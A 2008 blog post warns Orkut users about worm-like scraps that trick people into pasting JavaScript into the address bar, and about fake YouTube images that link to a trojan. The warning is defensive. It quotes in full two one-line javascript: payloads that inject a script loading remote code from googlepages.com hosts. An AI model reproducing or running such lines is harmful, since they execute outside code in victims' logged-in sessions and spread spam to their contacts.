Thursday, February 07, 2008

Lot of malicious JavaScripts are at work in Orkut - sending scraps to all your friends without your knowledge!

You might have already come across some scrap or message on Orkut instructing you to copy a link to your address-bar and asking you to run it (by hitting ENTER). I agree that there are many harmless useful scripts like the most common 'Send Scraps to All' type. But please don’t run it unless you are cent per cent sure that it is safe. Because it is highly probable that it is a trick to compromise or infect your computer. Most of these scraps are result of activities from some malicious codes or viruses like entities. These scraps are capable of modifying and deleting itself, and adds you to the some Orkut Community.

Many of you have likely received such scraps from friends of yours that they actually didn't send, and friends may have received scraps that appeared to come from you!

Two examples of such scraps are given below:

Example 1:

"Here are some amazing tricks to make your cell phone battery last longer. It worked for Me. Just copy the JavaScript, paste it in your Address bar (the place where u see www.orkut.com) and hit ENTER

javascript:d=document;c=d.createElement('script');d.body.appendChild(c)
;c.src='http://userscripts.googlepages.com/news.user.js';void(0)

Trust me, you'll find this newsletter informative!
And If U Like it..You can even Go Here for More Tricks."


Example 2:

"Here are some cool pic..BY XXXXX.. Just copy the JavaScript, paste it in your address bar and PRESS ENTER

javascript:d=document;c=d.createElement('script');d.body.appendChild(c)
;c.src='http://tricks80.googlepages.com/20885.user.js';void(0)

trust me, you'll find thispic funny!"

In the first example, it also links to an Orkut community, asking you to join it.


Recently I got some scraps mimicking a YouTube video showing some thing vague - just to ignite our curiosity!....to make you click on it with an intention to view the video. But actually it is a picture not a flash video. The picture is linked to some problematic website hosting a Trojan named Infostealer.Orcu. You will realize something is wrong with that only after clicking the picture! One such picture is given below.



A picture mimicking YouTube flash video


Usually such scraps will also have some thing written purposefully in Portuguese...something like "Olha so que encontrei Varios flagras no BBB8 vc vai pira". This worm, named as MW.Orc, primarily targets Brazilian users of Google's Orkut website.

But you can make sure whether it is a picture or a genuine Flash Movie before clicking it. To know whether it is a genuine flash video just right click it, if you see Flash Player shortcut menu, it is a genuine flash video and if you see a shortcut menu containing "Save Picture As..." or "Properties", it is a picture.

Try this for yourself with the two pictures given below...one is a real flash video from YouTube and the other is just a picture of it linked to this blog!




---------------------------------------------






Alternatively, place your pointer over the picture and check at left most bottom of your browser's status bar. If you see a link there, if it is a picture linked to some other site. Make it a habit, ALWAYS CHECK DESTINATION OF THE LINK AT THE LEFTMOST BOTTOM OF THE STATUS BAR IN YOUR BROWSER. But this alerting of link at the status bar of the browser can be blocked with some scripts. So this method may not be reliable always.


These malicious codes can send scrap to all your friends when you are logged on to Orkut, without your knowledge! When your friends sees such a scrap from you on their scrap book, he/she will click or run it without a second thought, since it is from you and they have full trust in you! And if your friends falls prey to this prank, then it sends the same scrap to all friends in their list, this way it spreads and is now clogging the Orkut community. Some sites point this as Orkut worm or XSS worm. It exploits vulnerabilities in the XSS error in code created by Google webmasters. This is something like reincarnation of SPAM e-mail or Junk e-mail in Orkut!


So how to tackle it? DO NOT EXECUTE THE CODE OR CLICK ON THE LINK.....DELETE IT AS SOON AS YOU SEE IT.


Interestingly many of these SPAM Script codes are hosted on Google pages...a free hosting service from Google! Orkut is a Social Network from Google and it is being hacked with their own resources! Hope people at Google and Orkut will come forward with a permanent fix for this.

.

No comments:

Post a Comment